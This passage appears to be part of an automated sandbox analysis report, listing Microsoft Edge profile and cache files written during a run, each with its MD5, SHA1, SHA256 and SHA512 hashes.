| SHA512 | d87e0729c21e56e6016b5cb71c3e601b4deacc8da47f17393d995ad134fb01d4361c7b5bc9b705a9f18eae9d4d2cf520bea769ab1a07a62639ef5903046afd43 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e238e093dcd461b0702ca80d441ca3fb |
| SHA1 | e05f218a3cd93f958be7b50f4569bddbf5325bd2 |
| SHA256 | 8a83ab01f5519591a17f922e76b94cf2e90584146faa91c8f0f8a81fc282bae8 |
| SHA512 | 9e504ffa5281d4ba2286d403b7b11d497d6bcc59610a99010a104304c05ad0f523ded741d33a00bf0c0e350bb8bdbfa7e0ab43a776c2345c8aed4fd1d4b6afcc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 90f8ae97f491a8729273948fa2db02c5 |
| SHA1 | 2e711fbb5dd017cb5222d308c5c4d291e22038cf |
| SHA256 | 5f0f093bafa33b078c1038c6154af801e333e0aa862ffee64caad76b79f9990e |
| SHA512 | b6776cce4093114da65b4ded571b3921776c73492ed95c958ded2124165dc220683804bf51df6978befac52f10787d48435778b0aacefbd83decfa6b7de45d08 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5c0de2.TMP
| MD5 | 0d74ed4340422fb1769a17fcbb4e9460 |
| SHA1 | 970f8818b3d77e9b4963a07a74d18d17da1960ad |
| SHA256 | 2ee5b6dcf0bbe2e07ed81d84ef7ede11906d7375423369257e69d3af336d8216 |
| SHA512 | cb9e2374514a3515821f2f12883ed21baad59bb7ed8479fa0157631fec3aac58e5e0396bf54131cf123ae01f54214c7d62634834cfde6715979616511bc483bc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | dae724dece99b424f833db98b400c721 |
| SHA1 | e5d034e3d31b37f816f1b1ae5792ff183b02ae51 |
| SHA256 | 9241235c2f46e440a91cea2f877aa7fc75bd689cd338b40e15361482c0432186 |
| SHA512 | f3efe8abfea22ff258f9d610b7aaca62e98eae73a380d0fbb1959f48908ac89afe197085d645ff43244e781c92f534d4c36a69ffb52e6ad1370890ab2c24fd57 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\e819d3d5-3d8b-4ca1-9eb8-9b0a32b9b2c6\index-dir\the-real-index~RFe5c0e11.TMP
| MD5 | aa302c87f0831629063a2be3ca0bdd1b |
| SHA1 | 0336a1db36cc74b9c2c275d6b602941d638fc05d |
| SHA256 | a957287be7b4eb9379ac3e026fb26d65225d813196d73d31cebbe9c0e7324c26 |
| SHA512 | b9f1b4ecb9610de6bab9a7ffa52553c1293b6a312b81f9ca8fba266b2b678cfa1314127d9e80adf6bda4016b6fda91992679d63ebc080c458f3570d2974cba2b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\e819d3d5-3d8b-4ca1-9eb8-9b0a32b9b2c6\index-dir\the-real-index
| MD5 | 02d829c0c8e6d89ec1633d5fa1177712 |
| SHA1 | 6bb84b3c40f2b6d0ba7ae06d578f732377657083 |
| SHA256 | c0165a24840265ae82b7439b3db15a0de073bf53885d712a982e3c1222041b91 |
| SHA512 | 88af1b677e347a7e2cda9d65d199c7efec4306574d8a19c761739638753e40096f103a210632a160e2606fe393a126b35d3f4e97e73ff4e6b4913816a4743499 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ff852b6c-4618-4c26-97b0-e82ca5000671\index-dir\the-real-index
| MD5 | 515e3ae0380e02ae883db2d90101f64c |
| SHA1 | 95a60953e08f8da11902ed949382fee9cbc775cf |
| SHA256 | 5d393f52e82740030f6e6deff189a30454aff5e22be5c63406ca0ed46a2887d3 |
| SHA512 | ecaa7f21af5ae7ad70e848d5aa13cb8f21da6189dbf70d7d1c8c6a643c8bb72620d604f1f8b6649720ae160cefd121befa15f077195b536efd95c760a1fcd556 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\ff852b6c-4618-4c26-97b0-e82ca5000671\index-dir\the-real-index~RFe5c0e11.TMP
| MD5 | 8fb1cfced5c4757a1bdabfe0afa37aa2 |
| SHA1 | 63ac9a886fbbb271aa1bf748dfba8d683b7b1db6 |
| SHA256 | 1d0fa9fd5a74b9aae950ebaa968b83d3d399849823993dc7bff6e47c4935acd8 |
| SHA512 | 8601adccbc84a8112c8499f2d24c6be88c64059817f25fdb069d4a1032aacb3f93f0fc9d7ca9f321e2f4cf4cc0a7aff6d90168ac7f5082dfabd3cf048a009ae9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\6e410e6e-9071-4293-9cc4-5eb496c5ff82\index-dir\the-real-index
| MD5 | ac57bd548e374be174e3594e79298d1d |
| SHA1 | f9b51626793a9c8ff58a69c8386adf68a2f4890d |
| SHA256 | 81a2233b4146e959ad5b1c912970318b603cbf7ed6ad465d4aea7c0269da57d4 |
| SHA512 | 11062b664ac9e0f4ebbe5b8c57281d59d66f29b1e422daef09d1f68c7373f6045e52611125ac40df42296a6428eccfb1281a57747acaba7983dc70fef1096dd1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2f967d2ccb19cbf44041d433fa19d133 |
| SHA1 | a7720b786cf9721c9a961658da49da3b1f13a509 |
| SHA256 | ea4ffde8c8f099a6c0eb6abed64e4b1ed1412145a44b48b17b64c3fb917e73c6 |
| SHA512 | 82a89d2ebe1d9055815ade6338d5ef93728997f32b1bace0d4795729ec04bbd3e430dab1619cef98a9655aa110707a68cec5f3eff93d0ef672beb2d7f06bcace |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
| MD5 | 7bc7a4f01ba596b555d3acca2ff448f1 |
| SHA1 | d46d1bc3bade039abecd0f499852ec2dc66b5f3f |
| SHA256 | 2bf4563e2e5b8ba41c0015076e8fd67a892735e43a96a7ff88a7c87b39d15d5f |
| SHA512 | 7eccf18eb682ee25c6b91512b11a907dd142f3e5ef34cd2aeb4090d7c1ea358009108ed47c315a666e2c853c18b01654557112b94d7a188ec091fd763516031f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | e8845d2643923befc4fe17be99630242 |
| SHA1 | 4ef47e565c131dce08cdbbb41f4e7ff2333edba3 |
| SHA256 | 7be64770bed47698c2c0fffd14c4f01addcdeffb1210aca70dc69ceacec35014 |
| SHA512 | ee77256387575268bf0e1d57489747d5eea94285815c7da646d6b9ad985ca7dea8f9576c90d4ad11ad3b3a13b903dd353344e5cb192620ba1c9c047cfef8db32 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a4f60571df73e9d386e958c1e5c31247 |
| SHA1 | 585807aa58a9c6d5f524a06d4149640e8af274e9 |
| SHA256 | 258e9b6c97905d4c1bfac9836da281d50e405d76cd5254614e166f946c6f0cd6 |
| SHA512 | f4136fec0959c71dd3a3342e14d10a94886925124e83fa30dfd6bbb4b407ae977aae8e1099f64cc5efe7a9516ed1e4a370ab4595c33c0e7d5f3400e19d6d2b1d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001
| MD5 | 3fd11ff447c1ee23538dc4d9724427a3 |
| SHA1 | 1335e6f71cc4e3cf7025233523b4760f8893e9c9 |
| SHA256 | 720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed |
| SHA512 | 10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 9fb29bf766b16f273c171f10285aec89 |
| SHA1 | 71015485af475460febbbe5bbe3263247750850a |
| SHA256 | f64d9549284e01e55eb76520517a82de6037a3c1fb5ae57640893d785581e5dc |
| SHA512 | 13d86e01060a40c315b3d8be471dfcf8e8b526ffd70c4efec3a590d9e06665f5c7d44550645a57b62bc80d15f004580c5c18f597427192a1a8f617e6f5b58c3a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnWebGPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f8eacbdfc82e910b743f7e9c25cd194c |
| SHA1 | 6c31e8f385d989120972e6e652b99622dfefa5ac |
| SHA256 | 15b71ca1817b83d49823bccb26fb0107161315a962dfb53d7a6044d6d10b2be4 |
| SHA512 | c28f8c44535739eaa1d8a85435d678ac9ff6972b9466886019b0b6a7a445f54c2e429d61cf933d75a760fd154b07966478ba96bf3c6e80db86ccfe5cb093f1c6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations
| MD5 | 961e3604f228b0d10541ebf921500c86 |
| SHA1 | 6e00570d9f78d9cfebe67d4da5efe546543949a7 |
| SHA256 | f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed |
| SHA512 | 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version
| MD5 | 3e45022839c8def44fd96e24f29a9f4b |
| SHA1 | c798352b5a0860f8edfd5c1589cf6e5842c5c226 |
| SHA256 | 01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd |
| SHA512 | 2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000063
| MD5 | 2ff8e346c16edf90f254cc9569edd9cc |
| SHA1 | f00d8be3263ce208b2cae645f4f27c509552911a |
| SHA256 | 98a1992b7a10930c598c5d10b857d55d67317e584f662c3d44c97b8996698c4a |
| SHA512 | 7c1cc5329662cd25b14c86e4b93ceb6cb281ea994b315e1e0dca572dcb7f02a796da1b8c30352d7219d53c700fe114ff5eb831851d3a7b25c49a09255d887281 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0
| MD5 | 75eee70fe5ea048254d7173f0a39556c |
| SHA1 | b6cb8a413f2ab23bff77648ef1f6ce69d51bfc28 |
| SHA256 | 1fd36b3c3420470178eccd4d849a8fb19412fb602e1cd16a9c9c163379604c2b |
| SHA512 | 2ce70321ed657de06db11904b8eed2015f2933dba80f44057d79bddd21cf876772cb569210ea84858b66bf26dd28fac81584582142942d6830b54e88fac60b0a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000065
| MD5 | 6997fcb39fe7781b738ca7f61524ff18 |
| SHA1 | 438e41ff8c55a92b59e1191ccee44a2eccaf811d |
| SHA256 | 619a26750446f311c5c46d9cc74353bedf634e6446bd4b3b9f9d65fb87286c21 |
| SHA512 | 204bd2eaf82516ee5940e5c97c8e54744a14c7d102d00a20ddb55fbbe42bb59e628d9838e41007ba88f6d621829edfeea7d04b7aabf7e1caa6b712e8e48e5f81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006a
| MD5 | 94f017480081b6511d076530d8f80ad7 |
| SHA1 | faa04d68d0a127ea7fa3fda4cb5251693058aeab |
| SHA256 | 851bbb8b33b12d30362903d493b81ec33e7bd960af1447249cc7f4f9d106be24 |
| SHA512 | acb297e9bbbab99f77b8eeffc548fa652026140af6d399400ab0f461abb42ddba67d46f81f8cb621ef3df576d68e7cd5ca96f7dc70f9b3fe017f930e5864a396 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000069
| MD5 | 9ddb5725e095c53374b273082c66be2a |
| SHA1 | 45b9ef59fda8cdd448548e5d1979f8b727c7b149 |
| SHA256 | e45ce1681e7f71e194cdbb3a44fad2fe39fd7cc1579f860f5f61d403e73c5b33 |
| SHA512 | 4abb98010fa62e62c6b8d92277b2c725423e0c910c0e220c16e7fff3ccb9875c94d34657ef8d323223790349b5e8bb9c5140ffa46c27de78a3a9a23f53c25563 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000068
| MD5 | 743150a579c41a52757e3365ecdd471d |
| SHA1 | cb81dc7ad04407ccec93d594a6699bc92529b8c1 |
| SHA256 | 06daa0fd7185c78a2f971e499293dc70b0173bda0098dc88947a1b02f685230e |
| SHA512 | 99fc4d97d4f7ace6eaa4de3d26fef37d4edc23741dc5e331a7d1c685d06613b4476800b146fb48f8dfc7781630df8111c2716a850bc5ed9044f45e4d12db1587 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000067
| MD5 | 74bdd2e52596ddb66c9471d630874cee |
| SHA1 | 160e91e26b51331b1fb633b3c571616e9314a735 |
| SHA256 | 33bbaad3fd7cdfbcd33e8296cfad47003e0fb67353204d5e4cf75e2e4debb5f9 |
| SHA512 | f1c6dd932cbb6f6edf02c0b69feefeecb26a3c31d9147c2264409605843eec06627636a1dc6fd32dd124a8a2e93aa20689ff86d308f1ccb2029487601895a03d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000066
| MD5 | da1edbc6fc3cc765fa17d845b5aa9a9a |
| SHA1 | 77f552eedc3ffc593d1d1646d948ff0611d7cd86 |
| SHA256 | b29942275462c3361abc835f294a33562fd0a2b4a4ab7b26743b8eae77e9a46a |
| SHA512 | 35c4f9d12f85073cedf1c2d38bcfe94dbec7bf98228dd44540e7f97124e27df33e7a51bbc89d643052ddbaf2d02b6051a6aeaae880cabc74b80ca42b66b465da |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000064
| MD5 | c4d5a245c070bb37903848cf7a4b3a97 |
| SHA1 | 82208afa723e5ef60e0fb5460be90271220d36c2 |
| SHA256 | 4d175f240f58739a534570c00a0e70d94202833d85ab240d14386ed3eab4d0c4 |
| SHA512 | caadbd85c7c8ba7f44f7d7cf60937f90982351737c35f03b4d252eba2a2639dc6eddd02aa550d4231353968d4397df0277f78bcd8e85b5ed5a7dcd46dc8e1cca |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3
| MD5 | 5a74dffe032559557fd5bdd1918fc32c |
| SHA1 | 6a68e4252086e91d8d307207d124ef6a03ab9ff2 |
| SHA256 | 9b192d3c03039a58a3050ee38259ec4d9284d8eff7739171fc315188dd6825f6 |
| SHA512 | c977094b9b83f37195a68b668fe1eb6b419f07419239182f554232bda2a659b806dbaaff60f4506bc0b8c107dab2a2fa5e9667db2fe5c4438cbe2e71b1b45b31 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1
| MD5 | 20304f63e193892ec0f1bd80050fbf99 |
| SHA1 | a8fc4757e3233036619374bc214a770c662785fb |
| SHA256 | 17eca59256dcf5718c2dd8ee886b90d8417267eb102f70c1a21c1f4829a59d3c |
| SHA512 | a3df5725e50cc85d003cc77cb540f49743203b53d88a7c485344a3d4c1ea87dcc52c53dca80439a5bded21d3da3227494eb2a917868a194d6e7548954bb1e8a7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2
| MD5 | df53ab4277f045da6806ea70324b22b5 |
| SHA1 | 477ee8607fb46dfb93601b7ad50bcd7997d3871a |
| SHA256 | 2311f395affef4b0cabaf94451c0235bab93c6f817147404f3c40e266b261dfe |
| SHA512 | b50ebbf621ea1555c84be8a889b00498e767dc75b60a54966507d83a86a7f77c2fe1871657d269236be0b30601740265023df6573a70aeb16771347350f9ef81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG
| MD5 | 78ea317200d1fd4b45fbce60412b7d15 |
| SHA1 | 19e4ae2fc791f8a2386cf266c99947cd8aa87b09 |
| SHA256 | 4b75be9b08cf82228c7b09ce25d803fdc439f8d612ee5b6fb7ccdc2fd9236753 |
| SHA512 | 18f42d92b16fc76bdade5cc1192176f9cf6918bc9d9d6269a50b89abe6aefc2894a398ba70f02f7280d443f4074fe75ab0c9bf83ff12205c485685ac8d917798 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e78bc6208f7884a220029bff0c5b1aa5 |
| SHA1 | 2b0bc5a9ae8fd67442c72e24c3dad09a9d61472e |
| SHA256 | b80aa742716ce766d298b04e7b0ca1830bd36a7fc5b9d9d08ac6af7476042e24 |
| SHA512 | 00d28162a8ba46261446d0ec3eaf457242a7250a22611d1ecb44bb6ea5e3746893a763c6b0c2bd270b7cf1fed996987a30f32071d11b2a150347aac83f3b0c67 |